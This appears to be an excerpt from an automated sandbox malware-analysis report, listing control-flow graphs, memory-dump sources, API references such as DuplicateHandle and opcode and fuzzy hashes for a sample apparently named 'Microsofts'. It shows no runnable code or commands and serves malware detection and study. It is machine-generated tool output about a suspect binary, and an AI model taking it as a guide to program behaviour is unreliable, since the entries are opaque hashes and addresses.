                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 554 bbaf78-bbafaf call bba428 559 bbb18b-bbb196 554->559 560 bbafb5-bbafb7 554->560 561 bbb19d-bbb1a8 559->561 560->561 562 bbafbd-bbafc1 560->562 567 bbb1af-bbb1ba 561->567 562->561 563 bbafc7-bbafff call bbab68 562->563 563->567 577 bbb005-bbb009 563->577 572 bbb1c1-bbb1cc 567->572 576 bbb1d3-bbb1ff 572->576 608 bbb206-bbb232 576->608 578 bbb00b-bbb00f 577->578 579 bbb015-bbb019 577->579 578->572 578->579 580 bbb01b-bbb022 579->580 581 bbb024-bbb028 579->581 583 bbb040-bbb044 580->583 581->583 584 bbb02a-bbb02e 581->584 587 bbb04b-bbb052 583->587 588 bbb046-bbb048 583->588 585 bbb039 584->585 586 bbb030-bbb037 584->586 585->583 586->583 590 bbb05b-bbb05f 587->590 591 bbb054 587->591 588->587 596 bbb13e-bbb141 590->596 597 bbb065-bbb069 590->597 591->590 592 bbb179-bbb184 591->592 593 bbb0ae-bbb0b1 591->593 594 bbb0dd-bbb0e0 591->594 595 bbb110-bbb113 591->595 592->559 601 bbb0bc-bbb0db 593->601 602 bbb0b3-bbb0b6 593->602 606 bbb0eb-bbb10e 594->606 607 bbb0e2-bbb0e5 594->607 599 bbb11a-bbb139 595->599 600 bbb115 595->600 603 bbb143-bbb146 596->603 604 bbb151-bbb174 596->604 597->592 605 bbb06f-bbb072 597->605 627 bbb097-bbb09b 599->627 600->599 601->627 602->576 602->601 603->604 611 bbb148-bbb14b 603->611 604->627 612 bbb079-bbb095 605->612 613 bbb074 605->613 606->627 607->606 607->608 618 bbb239-bbb2ab 608->618 611->604 611->618 612->627 613->612 637 bbb30d-bbb371 618->637 638 bbb2ad-bbb2b0 618->638 660 bbb09e call bbb4ef 627->660 661 bbb09e call bbb500 627->661 630 bbb0a4-bbb0ab 655 bbb37a-bbb38a 637->655 656 bbb373-bbb378 637->656 638->637 639 bbb2b2-bbb2c1 638->639 643 bbb2d9-bbb2dd 639->643 644 bbb2c3-bbb2c9 639->644 645 bbb2df-bbb2ff 643->645 646 bbb305-bbb30c 643->646 647 bbb2cb 644->647 648 bbb2cd-bbb2cf 644->648 645->646 647->643 648->643 657 bbb38f-bbb390 655->657 656->657 660->630 661->630
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 9c5c67599b959656cefb4ad5afb238a187af6fee01238c0b68480839043f94e3
                                                                                                                                      • Instruction ID: 7e26ca3ea8eff2ceb588b035d8038d349633b66230f722b6ec767e28fa5eaab8
                                                                                                                                      • Opcode Fuzzy Hash: 9c5c67599b959656cefb4ad5afb238a187af6fee01238c0b68480839043f94e3
                                                                                                                                      • Instruction Fuzzy Hash: 38B1F3357042048FEB156F78D864ABE7BE2EF85320F50429AE926DB3D1DFB58C058762

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 662 51ca81a 663 51ca820-51ca8b4 DuplicateHandle 662->663 664 51ca8bd-51ca8da 663->664 665 51ca8b6-51ca8bc 663->665 665->664
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 051CA8A7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4655649913.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_51c0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: a0c792f1c5aeea15f7dfc7390154c098683f4eb7f7e0f032a296aed0caf5f3ff
                                                                                                                                      • Instruction ID: cdfa186f6af9cfdfadc4b5f76c024e2b8523137044662f7d3d8ff7618798472d
                                                                                                                                      • Opcode Fuzzy Hash: a0c792f1c5aeea15f7dfc7390154c098683f4eb7f7e0f032a296aed0caf5f3ff
                                                                                                                                      • Instruction Fuzzy Hash: 8621E3B5900248EFDB10CFAAD985ADEBBF8FB48310F14845AE914A7350C379A954CF65

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 668 51ca820-51ca8b4 DuplicateHandle 669 51ca8bd-51ca8da 668->669 670 51ca8b6-51ca8bc 668->670 670->669
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 051CA8A7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4655649913.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_51c0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 8239e9d4b35a1b2e2eb7c03a5f7489788362f21a81a0e0c1e0849e1abe0d20ba
                                                                                                                                      • Instruction ID: ec684ee6d2aeba0027699bba5c63c876df030ce6dd1c804ceaf39471af5e4572
                                                                                                                                      • Opcode Fuzzy Hash: 8239e9d4b35a1b2e2eb7c03a5f7489788362f21a81a0e0c1e0849e1abe0d20ba
                                                                                                                                      • Instruction Fuzzy Hash: 6121E3B5900248EFDB10CFAAD985ADEBBF8EB48310F14845AE914A3310C379A954CF65

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 673 bbaf72-bbaf89 674 bbaf91-bbafaf 673->674 675 bbaf8c call bba428 673->675 678 bbb18b-bbb196 674->678 679 bbafb5-bbafb7 674->679 675->674 680 bbb19d-bbb1a8 678->680 679->680 681 bbafbd-bbafc1 679->681 686 bbb1af-bbb1ba 680->686 681->680 682 bbafc7-bbafff call bbab68 681->682 682->686 696 bbb005-bbb009 682->696 691 bbb1c1-bbb1cc 686->691 695 bbb1d3-bbb1ff 691->695 727 bbb206-bbb232 695->727 697 bbb00b-bbb00f 696->697 698 bbb015-bbb019 696->698 697->691 697->698 699 bbb01b-bbb022 698->699 700 bbb024-bbb028 698->700 702 bbb040-bbb044 699->702 700->702 703 bbb02a-bbb02e 700->703 706 bbb04b-bbb052 702->706 707 bbb046-bbb048 702->707 704 bbb039 703->704 705 bbb030-bbb037 703->705 704->702 705->702 709 bbb05b-bbb05f 706->709 710 bbb054 706->710 707->706 715 bbb13e-bbb141 709->715 716 bbb065-bbb069 709->716 710->709 711 bbb179-bbb184 710->711 712 bbb0ae-bbb0b1 710->712 713 bbb0dd-bbb0e0 710->713 714 bbb110-bbb113 710->714 711->678 720 bbb0bc-bbb0db 712->720 721 bbb0b3-bbb0b6 712->721 725 bbb0eb-bbb10e 713->725 726 bbb0e2-bbb0e5 713->726 718 bbb11a-bbb139 714->718 719 bbb115 714->719 722 bbb143-bbb146 715->722 723 bbb151-bbb174 715->723 716->711 724 bbb06f-bbb072 716->724 746 bbb097-bbb09b 718->746 719->718 720->746 721->695 721->720 722->723 730 bbb148-bbb14b 722->730 723->746 731 bbb079-bbb095 724->731 732 bbb074 724->732 725->746 726->725 726->727 737 bbb239-bbb2ab 727->737 730->723 730->737 731->746 732->731 756 bbb30d-bbb371 737->756 757 bbb2ad-bbb2b0 737->757 779 bbb09e call bbb4ef 746->779 780 bbb09e call bbb500 746->780 749 bbb0a4-bbb0ab 774 bbb37a-bbb38a 756->774 775 bbb373-bbb378 756->775 757->756 758 bbb2b2-bbb2c1 757->758 762 bbb2d9-bbb2dd 758->762 763 bbb2c3-bbb2c9 758->763 764 bbb2df-bbb2ff 762->764 765 bbb305-bbb30c 762->765 766 bbb2cb 763->766 767 bbb2cd-bbb2cf 763->767 764->765 766->762 767->762 776 bbb38f-bbb390 774->776 775->776 779->749 780->749
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: e68848a391b7410eab083b1e5c08679ba32998b8852ef748e5a7b0f128230c15
                                                                                                                                      • Instruction ID: a55bc780096f8a94babc20fcb0063c40d5f599edbe4431793bf5391e27fe96a0
                                                                                                                                      • Opcode Fuzzy Hash: e68848a391b7410eab083b1e5c08679ba32998b8852ef748e5a7b0f128230c15
                                                                                                                                      • Instruction Fuzzy Hash: EC81D2357002048FEB15AF78D868A7E7BE2EFC9320B5445AAE526DB3D1DFB49C018761

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1483 bb19b8-bb1a13 1487 bb1a35-bb1a84 1483->1487 1488 bb1a15-bb1a34 1483->1488 1492 bb1a9f 1487->1492 1493 bb1a86-bb1a8d 1487->1493 1496 bb1aa7 1492->1496 1494 bb1a8f-bb1a94 1493->1494 1495 bb1a96-bb1a9d 1493->1495 1497 bb1aaa-bb1abe 1494->1497 1495->1497 1496->1497 1499 bb1ac0-bb1ac7 1497->1499 1500 bb1ad4-bb1adc 1497->1500 1501 bb1ac9-bb1acb 1499->1501 1502 bb1acd-bb1ad2 1499->1502 1503 bb1ade-bb1ae2 1500->1503 1501->1503 1502->1503 1505 bb1b42-bb1b45 1503->1505 1506 bb1ae4-bb1af9 1503->1506 1507 bb1b8d-bb1b93 1505->1507 1508 bb1b47-bb1b5c 1505->1508 1506->1505 1514 bb1afb-bb1afe 1506->1514 1509 bb1b99-bb1b9b 1507->1509 1510 bb268e 1507->1510 1508->1507 1520 bb1b5e-bb1b62 1508->1520 1509->1510 1512 bb1ba1-bb1ba6 1509->1512 1517 bb2693-bb2c5f 1510->1517 1518 bb263c-bb2640 1512->1518 1519 bb1bac 1512->1519 1515 bb1b1d-bb1b3b call bb02a8 1514->1515 1516 bb1b00-bb1b02 1514->1516 1515->1505 1516->1515 1521 bb1b04-bb1b07 1516->1521 1523 bb2642-bb2645 1518->1523 1524 bb2647-bb268d 1518->1524 1519->1518 1525 bb1b6a-bb1b88 call bb02a8 1520->1525 1526 bb1b64-bb1b68 1520->1526 1521->1505 1528 bb1b09-bb1b1b 1521->1528 1523->1517 1523->1524 1525->1507 1526->1507 1526->1525 1528->1505 1528->1515
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 42a50715ce7b9c4da412cc101dc0ddc18f922b111fb661cdb1f83be2183b08d6
                                                                                                                                      • Instruction ID: 830dd054d6c911b41bd780f6a8c42ea7427e9e13baa2f600f54a599c13960dcb
                                                                                                                                      • Opcode Fuzzy Hash: 42a50715ce7b9c4da412cc101dc0ddc18f922b111fb661cdb1f83be2183b08d6
                                                                                                                                      • Instruction Fuzzy Hash: FC326ED6E0D7D18BCB228F3458FC1A4BFE15F2A194B5E45CEC5C25B28BE6602886C353

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1647 bbb500-bbb509 1648 bbb50b-bbb510 1647->1648 1649 bbb512-bbb515 1647->1649 1650 bbb54a-bbb54d 1648->1650 1651 bbb51e-bbb521 1649->1651 1652 bbb517-bbb51c 1649->1652 1653 bbb52a-bbb52d 1651->1653 1654 bbb523-bbb528 1651->1654 1652->1650 1655 bbb52f-bbb534 1653->1655 1656 bbb536-bbb539 1653->1656 1654->1650 1655->1650 1657 bbb53b-bbb540 1656->1657 1658 bbb542-bbb545 1656->1658 1657->1650 1659 bbb54e-bbb5be 1658->1659 1660 bbb547 1658->1660 1667 bbb5c3-bbb5d2 call bbb4a8 1659->1667 1660->1650 1670 bbb61b-bbb61e 1667->1670 1671 bbb5d4-bbb5ef 1667->1671 1672 bbb620-bbb626 1670->1672 1673 bbb634-bbb640 1670->1673 1671->1670 1684 bbb5f1-bbb5f5 1671->1684 1672->1667 1674 bbb628 1672->1674 1678 bbb642-bbb663 1673->1678 1679 bbb667-bbb668 1673->1679 1676 bbb62a-bbb631 1674->1676 1681 bbb66f-bbb675 1678->1681 1682 bbb665 1678->1682 1679->1681 1683 bbb66a-bbb66d 1679->1683 1686 bbb689-bbb6bd call bbab68 1681->1686 1687 bbb677-bbb67a 1681->1687 1682->1679 1683->1681 1685 bbb6c0-bbb718 1683->1685 1688 bbb5fe-bbb607 1684->1688 1689 bbb5f7-bbb5fc 1684->1689 1697 bbb71f-bbb79f 1685->1697 1687->1686 1690 bbb67c-bbb67e 1687->1690 1688->1670 1691 bbb609-bbb612 1688->1691 1689->1676 1690->1686 1693 bbb680-bbb683 1690->1693 1691->1670 1694 bbb614-bbb619 1691->1694 1693->1686 1693->1697 1694->1676 1715 bbb7bf-bbb815 1697->1715 1716 bbb7a1-bbb7a5 1697->1716 1722 bbb820-bbb829 1715->1722 1723 bbb817-bbb81e 1715->1723 1754 bbb7a8 call bbb869 1716->1754 1755 bbb7a8 call bbb4ef 1716->1755 1756 bbb7a8 call bbb89d 1716->1756 1757 bbb7a8 call bbb500 1716->1757 1717 bbb7ab-bbb7bc 1725 bbb82b-bbb832 1722->1725 1726 bbb834 1722->1726 1724 bbb83b-bbb844 1723->1724 1727 bbb84a-bbb867 1724->1727 1728 bbb8d8-bbb8dc 1724->1728 1725->1724 1726->1724 1730 bbb8e5-bbb901 1727->1730 1758 bbb8df call bbb9e9 1728->1758 1759 bbb8df call bbb9f8 1728->1759 1733 bbb908-bbb962 call bbab78 1730->1733 1734 bbb903-bbb906 1730->1734 1735 bbb96a-bbb973 1733->1735 1734->1733 1734->1735 1736 bbb97a-bbb9b0 1735->1736 1737 bbb975-bbb978 1735->1737 1739 bbb9df-bbb9e5 1736->1739 1749 bbb9b2-bbb9d7 call bbab88 1736->1749 1737->1736 1737->1739 1749->1739 1754->1717 1755->1717 1756->1717 1757->1717 1758->1730 1759->1730
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b163c29afcebbc68025657466d3fe0b9f40746fb191dfbabce00e611edb7c4ad
                                                                                                                                      • Instruction ID: 480ae2815662bca093eb1a25f55d5a724e428bb141858e1ea9275ff477e844e6
                                                                                                                                      • Opcode Fuzzy Hash: b163c29afcebbc68025657466d3fe0b9f40746fb191dfbabce00e611edb7c4ad
                                                                                                                                      • Instruction Fuzzy Hash: 9FD19131B042048FDB15DB68C890ABEBBF2EF89320F2545AAE506DB3A1DBB5DD41C751
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0d10b6d03735a8dd624ba83c1339ac85c3414ff888e5c146a343758df6754baf
                                                                                                                                      • Instruction ID: dfac4f995605ab842fb0df9ba6749ca271cd8d505d40d3480cff005f2848d780
                                                                                                                                      • Opcode Fuzzy Hash: 0d10b6d03735a8dd624ba83c1339ac85c3414ff888e5c146a343758df6754baf
                                                                                                                                      • Instruction Fuzzy Hash: 9961D272B00205DFCB14EABCD884ABABFF5EBC9324B14856AE569E7750D771DC0187A0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b4c3fcbd644b943aeef11a79b386897f5b35f3f5be7dfd784bfba197bdcec834
                                                                                                                                      • Instruction ID: fa8647b3dbe30845493411acf47a436c8dcdaca650b1382586a83f509d975f73
                                                                                                                                      • Opcode Fuzzy Hash: b4c3fcbd644b943aeef11a79b386897f5b35f3f5be7dfd784bfba197bdcec834
                                                                                                                                      • Instruction Fuzzy Hash: 47A19078D0020ACFCB05EFB8E9A5A9DBBB1FB49305B205529E505A7359EB706D45CF80
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af7b3f7304dda00782b42c398120c09260ac2f43b6d6f19d2e1ea421f05e4776
                                                                                                                                      • Instruction ID: d6dd2b2820cf5bffc3d6ecce7daa5108003cad35a388ff6d48b121a6c23699f0
                                                                                                                                      • Opcode Fuzzy Hash: af7b3f7304dda00782b42c398120c09260ac2f43b6d6f19d2e1ea421f05e4776
                                                                                                                                      • Instruction Fuzzy Hash: 15A18D78E0020ACFCB05EFB8E9A599DBBB1FB49305B205529E505A7369EB706D45CF80
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: eb522ff6c5919f61d9f6a5425b6d17fd02f1e539e11611aa7a34ccb64c64c12c
                                                                                                                                      • Instruction ID: f196c4b8ad778bbc5ea4179c8b59af4211a3893fae0a49dffe823aa8942cb6e5
                                                                                                                                      • Opcode Fuzzy Hash: eb522ff6c5919f61d9f6a5425b6d17fd02f1e539e11611aa7a34ccb64c64c12c
                                                                                                                                      • Instruction Fuzzy Hash: 0051C274E00208DFDB48DFA9D494AEDBBF2BF89310F209469E815AB365DB749942CF10
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4f0b7fbf6abbacf8db7c1d6642203412e97117cb56b2dafae8b126b72bce662b
                                                                                                                                      • Instruction ID: 2c43c1dd37ebc8b978765dd1ceb030619747782daea6e231bfcf2f60f11ec84d
                                                                                                                                      • Opcode Fuzzy Hash: 4f0b7fbf6abbacf8db7c1d6642203412e97117cb56b2dafae8b126b72bce662b
                                                                                                                                      • Instruction Fuzzy Hash: 7831E535B042158BEF2D5B6998A42FE6AE6FBD5300F1841BED902C3395EFF48C458761
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e29001c436af2458e4dbb660b26bd55795271dcb217bd39e060a1765324f052
                                                                                                                                      • Instruction ID: 86d3050d7578877f27fe0fccf1ffb0a9dec47e9e60c06aa3a55255ce737329e5
                                                                                                                                      • Opcode Fuzzy Hash: 3e29001c436af2458e4dbb660b26bd55795271dcb217bd39e060a1765324f052
                                                                                                                                      • Instruction Fuzzy Hash: E441DD78E08248CFCB25CFA4D8944FCBBF2EF6A710F20509AC509AB216D67699058F51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 663150950e02f3ab65a1bc18acdc5d625eaac253d3f584b6ab714f4c3fe2c415
                                                                                                                                      • Instruction ID: 7a332e7e708252158ceb3828dc181a1ac89e5bd2a4e05579be5a1a5420f3f7d9
                                                                                                                                      • Opcode Fuzzy Hash: 663150950e02f3ab65a1bc18acdc5d625eaac253d3f584b6ab714f4c3fe2c415
                                                                                                                                      • Instruction Fuzzy Hash: 02419E74E012089FCB08DFAAD8949EDBBF2BF89300F249569E805BB364DB749945CF14
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5469be26593b8455720617fe59300545939d03c970035e1ade492a8fe6f0ef10
                                                                                                                                      • Instruction ID: a9e3221fb47c42bb67500acf17bbeef5752c6f0b61dbf02f3efdbb9e19d78ed2
                                                                                                                                      • Opcode Fuzzy Hash: 5469be26593b8455720617fe59300545939d03c970035e1ade492a8fe6f0ef10
                                                                                                                                      • Instruction Fuzzy Hash: DB31F27002A2468FD3012F31E5AC57A7FA0FBAF313B84AC46E00E82852CB396844CF31
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b57ac06c1d7f29234f03a6d251ffc91437a881222e05341402a576903c108164
                                                                                                                                      • Instruction ID: 73d06b1cca5bf69d722e072885c475da2b7d9317c770ada4070b86b5fb2457a1
                                                                                                                                      • Opcode Fuzzy Hash: b57ac06c1d7f29234f03a6d251ffc91437a881222e05341402a576903c108164
                                                                                                                                      • Instruction Fuzzy Hash: 64311775B001098FDB15DBA8C490EEDBBF2EF89320F595194E601AB365DBB0EC41CBA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bdf28a6749c8375b2823b4c22ce96187689f9f8ab13846827393b0c40be25943
                                                                                                                                      • Instruction ID: 17ff1780f9e4f4524d8e8b39467421424fac9e6dfb7f73de6e4b32e7efbf6f15
                                                                                                                                      • Opcode Fuzzy Hash: bdf28a6749c8375b2823b4c22ce96187689f9f8ab13846827393b0c40be25943
                                                                                                                                      • Instruction Fuzzy Hash: 24311775B001098FDB54DBA8D490EEDBBF2EF89320F555194E601AB365DBB1EC41CBA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 84173dd412de6cd61c82d319e58ae9c0abe76f42ccf6fde72e29b89c4f4ad3e0
                                                                                                                                      • Instruction ID: e1cf7506114b62625b14c79ef1ff18c099e2e7d72985d24f18b4273d0617e99d
                                                                                                                                      • Opcode Fuzzy Hash: 84173dd412de6cd61c82d319e58ae9c0abe76f42ccf6fde72e29b89c4f4ad3e0
                                                                                                                                      • Instruction Fuzzy Hash: A631BF357042049FDB04DF68C895AAEBBF6FF89300F5080AAE5068B362DB709D46CB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6df543796690aa0baf2dd8b641567c521a2750bfbfa0f61fe5385a97461a88c0
                                                                                                                                      • Instruction ID: a1e27c261054a708e7bf03dd461ee8781ddf2cecfc8ca1defb8d613a72749ec0
                                                                                                                                      • Opcode Fuzzy Hash: 6df543796690aa0baf2dd8b641567c521a2750bfbfa0f61fe5385a97461a88c0
                                                                                                                                      • Instruction Fuzzy Hash: 51219F71A001089FDB44EFB8C855ABE7BF6EF88300B5041BAE509D7255EB749E02C7A0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0b350945c415b3be08b10bc6c6f674ebf057daef77e942711ee7736ee5c328e4
                                                                                                                                      • Instruction ID: 80a0f5ddfc69c2726ab77ad27b772a4076c87bb894442b0b4f5fb28bd5434666
                                                                                                                                      • Opcode Fuzzy Hash: 0b350945c415b3be08b10bc6c6f674ebf057daef77e942711ee7736ee5c328e4
                                                                                                                                      • Instruction Fuzzy Hash: DE21C435A001869FCB14DF28D4609FE77B5EBD9350BA0C499E8499B344EB31EE06CB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4630209610.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_a5d000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
• Opcode ID: 4b0cbb480c88132dbfe24268bc63d77110e0b128e083e8aaed79d384a2cd9fd4
• Instruction ID: 1d92210f5e5438e9cd81d8fecbf84b09b8a0ecd16bf7761f03da2407965a5c2b
• Opcode Fuzzy Hash: 4b0cbb480c88132dbfe24268bc63d77110e0b128e083e8aaed79d384a2cd9fd4
• Instruction Fuzzy Hash: A821C271604244EFDB24DF14D9C0B26BBA5FB84319F24C56DDD0A4B296C37AD84BCA62

Memory Dump Source
• Source File: 0000000D.00000002.4630209610.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
